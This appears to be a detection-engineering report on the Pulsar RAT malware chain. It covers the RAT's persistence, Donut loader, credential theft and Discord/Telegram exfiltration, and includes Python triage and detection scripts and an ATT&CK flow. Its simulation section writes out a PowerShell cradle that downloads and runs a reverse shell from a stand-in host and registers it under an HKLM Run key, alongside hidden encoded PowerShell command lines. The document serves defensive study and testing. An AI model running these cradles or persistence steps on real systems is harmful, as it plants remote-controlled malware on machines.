Pulsar RAT Powers Live Chat Driven Remote Control and Advanced Infostealer Delivery via Donut Loader
Summary
The report describes a multi-stage Windows malware chain that relies on a concealed batch script for persistence, a PowerShell loader, and Donut-generated shellcode to inject a .NET stealer and remote-access toolkit into legitimate processes. The implant supports credential theft, webcam/audio capture, clipboard monitoring, and data exfiltration through Discord webhooks and Telegram bots. Persistence is maintained via per-user Run key entries and scheduled tasks, reinforced by a watchdog that repeatedly re-injects into explorer.exe. Anti-analysis coverage includes anti-VM checks, anti-debugging logic, and safeguards meant to detect process-injection monitoring.
Investigation
Researchers dissected the batch-based persistence stub, extracted and decoded the embedded Base64 content, and recovered a PowerShell stage responsible for decrypting a Donut shellcode blob. That shellcode loads a heavily obfuscated .NET payload (Client.exe) with modular assemblies such as Pulsar.Common.dll and Stealerv37.dll. Dynamic testing confirmed injection into svchost.exe and explorer.exe, active C2 communications, and memory-resident execution designed to avoid writing a decrypted executable to disk.
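The decoding step described above (Base64 out of the batch stub, then a PowerShell stage that wraps a further blob) is the kind of thing worth scripting for triage. The block below is an added example, not code from the report or from the malware itself: it finds long Base64 runs, decides whether each decodes to text (UTF-16LE as powershell -EncodedCommand uses, or plain UTF-8) or to a binary blob, recurses through the text layers and hashes the binary ones. The batch stub, the stage and the "blob" are constructed stand-ins; the real Donut blob is encrypted, so a decoder like this stops at the binary layer rather than recovering the shellcode, and the 64-character threshold is an assumed cut-off.

```python
import base64
import hashlib
import re

# A Base64 run this long is a payload, not an ordinary batch token (assumed cut-off).
B64_RE = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")


def find_base64_blobs(text):
    """Return Base64 candidates in text, longest first (payloads dwarf noise)."""
    return sorted(dict.fromkeys(B64_RE.findall(text)), key=len, reverse=True)


def b64decode_lenient(blob):
    """Decode even when the stub dropped the trailing '=' padding."""
    return base64.b64decode(blob + "=" * (-len(blob) % 4))


def bytes_to_text(data):
    """Return a decoded stage as text, or None when it is binary (e.g. shellcode).

    powershell -EncodedCommand carries UTF-16LE (every odd byte is 0 for ASCII
    script text); other stubs embed plain UTF-8/ASCII.
    """
    odd = data[1::2]
    if len(data) % 2 == 0 and odd and odd.count(0) > 0.9 * len(odd):
        try:
            return data.decode("utf-16-le")
        except UnicodeDecodeError:
            return None
    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        return None
    printable = sum(1 for ch in text if ch.isprintable() or ch in "\r\n\t")
    return text if printable >= 0.95 * len(text) else None


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def unwrap_stages(text, depth=0, max_depth=4):
    """Peel nested Base64 layers; text layers are recursed into, binary ones hashed."""
    records = []
    if depth >= max_depth:
        return records
    for blob in find_base64_blobs(text):
        try:
            data = b64decode_lenient(blob)
        except ValueError:
            continue
        inner = bytes_to_text(data)
        if inner is None:
            records.append({"depth": depth, "kind": "binary", "size": len(data),
                            "sha256": sha256_hex(data)})
        else:
            records.append({"depth": depth, "kind": "text", "content": inner})
            records.extend(unwrap_stages(inner, depth + 1, max_depth))
    return records


# Constructed stand-in for the encrypted Donut blob: high bytes, not shellcode.
FAKE_BLOB = bytes(range(0x80, 0x100)) * 2
# Constructed PowerShell stage: the real one would decrypt and run the blob.
SAMPLE_STAGE = (
    "$blob = [Convert]::FromBase64String('"
    + base64.b64encode(FAKE_BLOB).decode("ascii")
    + "')\n# decrypt $blob and execute it from memory here\n"
)
# Constructed batch stub of the kind the report describes: hides its folder, then
# hands the UTF-16LE stage to PowerShell as an encoded command.
SAMPLE_BAT = (
    "@echo off\r\n"
    'attrib +h "%APPDATA%\\Microsoft\\stub"\r\n'
    "powershell -NoP -W Hidden -ep bypass -enc "
    + base64.b64encode(SAMPLE_STAGE.encode("utf-16-le")).decode("ascii")
    + "\r\n"
)

if __name__ == "__main__":
    for rec in unwrap_stages(SAMPLE_BAT):
        if rec["kind"] == "text":
            print(f"[depth {rec['depth']}] text stage:\n{rec['content']}")
        else:
            print(f"[depth {rec['depth']}] binary {rec['size']} bytes sha256={rec['sha256']}")
```

Run it against a real stub by replacing SAMPLE_BAT with the file contents; the hash of the binary layer is what you compare against the report's IOC lists, and the depth-0 text is where the decryption routine and its key material will be visible.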
Mitigation
Detect and prevent PowerShell abuse involving execution-policy bypass, monitor for hidden-file creation under %APPDATA%, and alert on suspicious modifications to HKCU Run keys. Flag scheduled task creation that uses unusual naming patterns or unexpected triggers. At the network layer, block outbound connectivity to the identified IP address and enforce tight egress controls for Discord and Telegram API traffic. Strengthen defenses with detections for anti-VM/anti-debug behavior and apply application allow-listing to limit script-driven payload staging.
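As an added example (not the vendor's detection rules or logic from the report), the guidance above can be turned into checks that run over constructed, Sysmon-style records: PowerShell launched with an execution-policy bypass, a hidden window or an encoded command; Run-key values that launch scripts or interpreters, or that carry random-looking names pointing into user-writable paths; schtasks /create with a script action or a random-looking task name; and attrib +h applied under a user profile path. Field names (CommandLine, TargetObject, Details) follow Sysmon; the regexes, the hex-name heuristic, the placeholder Base64 and the task name are assumptions for illustration. The OneDrive record is included deliberately to show why "anything under AppData" on its own is too broad a rule.

```python
import re

# powershell.exe switches resolved by unique prefix (min length keeps "-e" as
# EncodedCommand) plus the explicit short forms it also accepts. Assumed subset.
PS_PARAMS = [("encodedcommand", 1), ("executionpolicy", 2), ("windowstyle", 1)]
PS_ALIASES = {"ep": "executionpolicy", "ec": "encodedcommand"}
PS_EXE_RE = re.compile(r'^"?(?:[a-z]:\\[^"]*?\\)?(powershell|pwsh)(\.exe)?"?(\s|$)', re.I)
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?\\([^\\]+)$", re.I)
SCRIPT_EXT_RE = re.compile(r"\.(bat|cmd|vbs|vbe|js|jse|ps1|hta|wsf)\b", re.I)
INTERPRETER_RE = re.compile(r"\b(powershell|pwsh|cmd|wscript|cscript|mshta)(\.exe)?\b", re.I)
USER_WRITABLE_RE = re.compile(r"\\AppData\\|\\Temp\\|\\Users\\Public\\|%(APPDATA|LOCALAPPDATA|TEMP)%", re.I)
HEX_NAME_RE = re.compile(r"[0-9a-f]{8,}", re.I)  # heuristic for random-looking names


def ps_param(token):
    """Map a possibly abbreviated switch (-ep, -W, -enc, ...) to its full name."""
    stem = token[1:].lower() if token[:1] in ("-", "/") else ""
    if stem in PS_ALIASES:
        return PS_ALIASES[stem]
    for name, min_len in PS_PARAMS:
        if len(stem) >= min_len and name.startswith(stem):
            return name
    return None


def powershell_flags(cmdline):
    """Evasion-relevant switches in a PowerShell command line (empty if not PowerShell)."""
    flags = set()
    if not PS_EXE_RE.match(cmdline):
        return flags
    toks = cmdline.split()
    for i, tok in enumerate(toks):
        name = ps_param(tok)
        nxt = toks[i + 1].lower() if i + 1 < len(toks) else ""
        if name == "encodedcommand":
            flags.add("encoded")
        elif name == "executionpolicy" and nxt in ("bypass", "unrestricted"):
            flags.add("ep_bypass")
        elif name == "windowstyle" and nxt in ("hidden", "1"):
            flags.add("hidden")
    return flags


def check_run_key(target, details):
    """Flag Run/RunOnce values that launch scripts, interpreters or odd user-path payloads."""
    m = RUN_KEY_RE.search(target)
    if not m:
        return None
    if SCRIPT_EXT_RE.search(details) or INTERPRETER_RE.search(details):
        return "Run value launches a script or interpreter"
    if USER_WRITABLE_RE.search(details) and HEX_NAME_RE.fullmatch(m.group(2)):
        return "random-looking Run value name pointing into a user-writable path"
    return None  # e.g. OneDrive.exe under AppData\Local is normal


def check_schtasks(cmdline):
    if not re.search(r"\bschtasks(\.exe)?\b.*\s[/-]create\b", cmdline, re.I):
        return None
    action = re.search(r"\s/tr\s+(\"[^\"]*\"|\S+)", cmdline, re.I)
    name = re.search(r"\s/tn\s+\"?([^\"\s]+)", cmdline, re.I)
    reasons = []
    if action and (SCRIPT_EXT_RE.search(action.group(1)) or INTERPRETER_RE.search(action.group(1))):
        reasons.append("task action runs a script or interpreter")
    if name and HEX_NAME_RE.fullmatch(name.group(1)):
        reasons.append("random-looking task name " + name.group(1))
    return "; ".join(reasons) or None


def check_attrib_hide(cmdline):
    if (re.match(r'^"?(?:[a-z]:\\[^"]*?\\)?attrib(\.exe)?"?\s', cmdline, re.I)
            and re.search(r"\+[hs]\b", cmdline, re.I) and USER_WRITABLE_RE.search(cmdline)):
        return "attrib hides a path under a user-writable location"
    return None


RULES = (("scheduled_task_persistence", check_schtasks),
         ("hidden_attribute_user_path", check_attrib_hide))


def triage(events):
    """Run the rules over Sysmon-style records; return (index, rule, reason) tuples."""
    alerts = []
    for idx, ev in enumerate(events):
        if ev["type"] == "process_creation":
            cmd = ev["CommandLine"]
            flags = powershell_flags(cmd)
            if "encoded" in flags or len(flags) >= 2:
                alerts.append((idx, "suspicious_powershell", ",".join(sorted(flags))))
            alerts += [(idx, rule, r) for rule, check in RULES if (r := check(cmd))]
        elif ev["type"] == "registry_event":
            r = check_run_key(ev["TargetObject"], ev["Details"])
            if r:
                alerts.append((idx, "run_key_persistence", r))
    return alerts


# Constructed sample telemetry. Paths reuse the artifact names the report cites;
# the Base64 value and the task name are placeholders.
SAMPLE_EVENTS = [
    {"type": "process_creation", "CommandLine": "powershell -NoP -W Hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"type": "process_creation", "CommandLine": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\backup.ps1"},
    {"type": "registry_event", "TargetObject": r"HKU\S-1-5-21-1004\Software\Microsoft\Windows\CurrentVersion\Run\bada287ebf",
     "Details": r"C:\Users\alice\AppData\Roaming\Microsoft\9bd8233d8354\0a1a98b5f9fc7c62.bat"},
    {"type": "registry_event", "TargetObject": r"HKU\S-1-5-21-1004\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
    {"type": "process_creation", "CommandLine": r'schtasks /create /tn "a3f9c1d27e" /tr "C:\Users\alice\AppData\Roaming\Microsoft\9bd8233d8354\0a1a98b5f9fc7c62.bat" /sc onlogon /f'},
    {"type": "process_creation", "CommandLine": r'attrib +h +s "C:\Users\alice\AppData\Roaming\Microsoft\9bd8233d8354"'},
]
```

Running triage(SAMPLE_EVENTS) flags records 0, 2, 4 and 5 and leaves the RemoteSigned script and the OneDrive autorun alone. The parameter-prefix handling matters in practice: rules that look only for the literal string "-ExecutionPolicy Bypass" miss "-ep bypass" and "-ex bypass", which is exactly how loaders of this kind are written.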
Response
If activity is detected, isolate the endpoint, stop malicious and injected processes, remove the hidden batch artifact and any related PowerShell scripts, and delete the associated Run-key value and scheduled task. Capture memory for forensic analysis, preserve logs for scoping, and hunt for correlated IOCs across the environment. Rotate potentially exposed credentials and monitor for lateral movement or follow-on payload deployment.
Attack Flow
graph TB
    %% Class definitions
    classDef action fill:#99ccff
    classDef process fill:#ffeb99
    classDef file fill:#ccffcc
    classDef registry fill:#ffe6cc
    %% Node definitions
    persist_bat["<b>File</b> – hidden BAT 0a1a98b5f9fc7c62.bat<br/><b>Location</b> %APPDATA%\Microsoft\9bd8233d8354\<br/><b>Technique</b> – T1547.001 Registry Run Keys / Startup Folder"]
    class persist_bat file
    run_key["<b>Registry</b> – Run key HKCU\Software\Microsoft\Windows\CurrentVersion\Run (value bada287ebf)<br/><b>Technique</b> – T1547.001 Registry Run Keys / Startup Folder"]
    class run_key registry
    powershell_loader["<b>Action</b> – PowerShell loader execution<br/><b>Technique</b> – T1059.001 PowerShell"]
    class powershell_loader action
    vm_checks["<b>Action</b> – Anti-VM / sandbox checks<br/><b>Technique</b> – T1497.001 Virtualization/Sandbox Evasion: System Checks"]
    class vm_checks action
    shellcode_decrypt["<b>Action</b> – Decrypt Donut-generated shellcode in memory"]
    class shellcode_decrypt action
    svchost_injection["<b>Process</b> – svchost.exe injection<br/><b>Technique</b> – T1055.002 Process Injection"]
    class svchost_injection process
    explorer_watchdog["<b>Process</b> – Watchdog re-injects into explorer.exe if the process dies<br/><b>Technique</b> – T1055.002 Process Injection"]
    class explorer_watchdog process
    credential_harvest["<b>Action</b> – Credential harvesting from browsers and password managers<br/><b>Techniques</b> – T1555.003 Credentials from Web Browsers; T1555.005 Password Managers"]
    class credential_harvest action
    system_discovery["<b>Action</b> – System and host discovery<br/><b>Techniques</b> – T1082 System Information Discovery; T1057 Process Discovery; T1518.001 Security Software Discovery; T1069 Permission Groups Discovery; T1016 System Network Configuration Discovery"]
    class system_discovery action
    audio_video_capture["<b>Action</b> – Audio, video, and clipboard capture<br/><b>Techniques</b> – T1123 Audio Capture; T1125 Video Capture; T1115 Clipboard Data"]
    class audio_video_capture action
    data_exfil["<b>Action</b> – Package data into ZIP and exfiltrate via Discord webhook and Telegram bot<br/><b>Techniques</b> – T1567.004 Exfiltration Over Webhook; T1041 Exfiltration Over C2 Channel"]
    class data_exfil action
    disable_uac["<b>Action</b> – Disable Task Manager and UAC<br/><b>Technique</b> – T1548.002 Bypass User Account Control"]
    class disable_uac action
    hide_artifacts["<b>Action</b> – Hide malicious files and directories<br/><b>Techniques</b> – T1564.001 Hidden Files and Directories; T1222 File and Directory Permissions Modification; T1036 Masquerading"]
    class hide_artifacts action
    scheduled_task["<b>Action</b> – Scheduled task fallback persistence<br/><b>Technique</b> – T1053.005 Scheduled Task"]
    class scheduled_task action
    %% Connections
    persist_bat -->|creates| run_key
    run_key -->|triggers| powershell_loader
    powershell_loader -->|performs| vm_checks
    vm_checks -->|leads to| shellcode_decrypt
    shellcode_decrypt -->|injects into| svchost_injection
    svchost_injection -->|monitors| explorer_watchdog
    explorer_watchdog -->|enables| credential_harvest
    explorer_watchdog -->|enables| system_discovery
    explorer_watchdog -->|enables| audio_video_capture
    credential_harvest -->|feeds| data_exfil
    data_exfil -->|followed by| disable_uac
    disable_uac -->|enables| hide_artifacts
    hide_artifacts -->|enables| scheduled_task
Detections
- Suspicious Alternate Data Stream (ADS) Zone.Identifier Manipulation Attempt (via process_creation)
- Possible Telegram Abuse As Command And Control Channel (via dns_query)
- Possible Schtasks or AT Usage for Persistence (via cmdline)
- The Possibility of Execution Through Hidden PowerShell Command Lines (via cmdline)
- Powershell Script was Executed from Uncommon Directory (via cmdline)
- Call Suspicious Windows API Functions from Powershell (via powershell)
- Suspicious Powershell Strings (via powershell)
- Possible Persistence Points [ASEPs – Software/NTUSER Hive] (via registry_event)
- Powershell Executing File In Suspicious Directory Using Bypass Execution Policy (via cmdline)
- Potential Malware Self-Removal or Stderr Concealment Operation (via cmdline)
- Possible Abuse Discord as a C2 Channel (via proxy)
- Suspicious Powershell Strings (via cmdline)
- Possible Remote System Discovery or Connectivity Check (via cmdline)
- Suspicious File Extension Added to Run Keys [ASEPs] (via registry_event)
- IOCs (DestinationIP) to detect: Pulsar RAT Powers Live Chat Driven Remote Control and Advanced Infostealer Delivery via Donut Loader
- IOCs (HashSha1) to detect: Pulsar RAT Powers Live Chat Driven Remote Control and Advanced Infostealer Delivery via Donut Loader
- IOCs (SourceIP) to detect: Pulsar RAT Powers Live Chat Driven Remote Control and Advanced Infostealer Delivery via Donut Loader
- IOCs (HashMd5) to detect: Pulsar RAT Powers Live Chat Driven Remote Control and Advanced Infostealer Delivery via Donut Loader
- Detection of Batch and PowerShell Execution for Hidden Malware Persistence [Windows Process Creation]
- Detection of Memory Injection and Payload Execution via PowerShell [Windows Powershell]
- Persistence via Run Key for Batch File Execution [Windows Registry Event]
- Detection of Hidden Batch File Execution via User Logon Persistence [Windows Registry Event]
- PowerShell Execution with Base64 Payload Extraction and Process Injection [Windows Powershell]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
Attack Narrative & Commands:
An adversary with administrative access to a workstation wants persistence across reboots. To avoid executable-based defenses, they craft a lightweight batch file (persistence.bat) that launches a PowerShell download cradle for a reverse shell. The batch file is written to %TEMP% and registered under the HKLM Run key, so it runs for every user who logs on (in that user's context, not as SYSTEM). Writing to the HKLM Run key requires an elevated session, so the regression script below must be run as administrator. The .bat extension matches the detection rule's ".bat" filter, so the rule fires.
Regression Test Script:
# -------------------------------------------------
# Persistence via Run Key - .bat payload (PowerShell)
# Run from an elevated session: HKLM\...\Run is not writable by standard users.
# -------------------------------------------------
# 1. Create a simple batch file in %TEMP% (the cradle is never executed by this
#    script itself; it would only run at the next logon)
$batPath = Join-Path $env:TEMP 'persistence.bat'
$batContent = @'
@echo off
powershell -NoProfile -WindowStyle Hidden -Command "IEX (New-Object Net.WebClient).DownloadString('http://malicious.example.com/revshell.ps1')"
'@
Set-Content -Path $batPath -Value $batContent -Encoding ASCII -Force

# 2. Add the batch file to the HKLM Run key
$runKey = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run'
New-ItemProperty -Path $runKey -Name 'Updater' -Value $batPath -PropertyType String -Force | Out-Null

# 3. Output confirmation (does not affect detection)
Write-Host "Persistence entry created: $runKey\Updater -> $batPath"
Cleanup Commands:
# -------------------------------------------------
# Remove the Run-key entry and batch file
# -------------------------------------------------
$runKey = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run'
Remove-ItemProperty -Path $runKey -Name 'Updater' -ErrorAction SilentlyContinue
$batPath = Join-Path $env:TEMP 'persistence.bat'
Remove-Item -Path $batPath -Force -ErrorAction SilentlyContinue
Write-Host "Cleanup complete."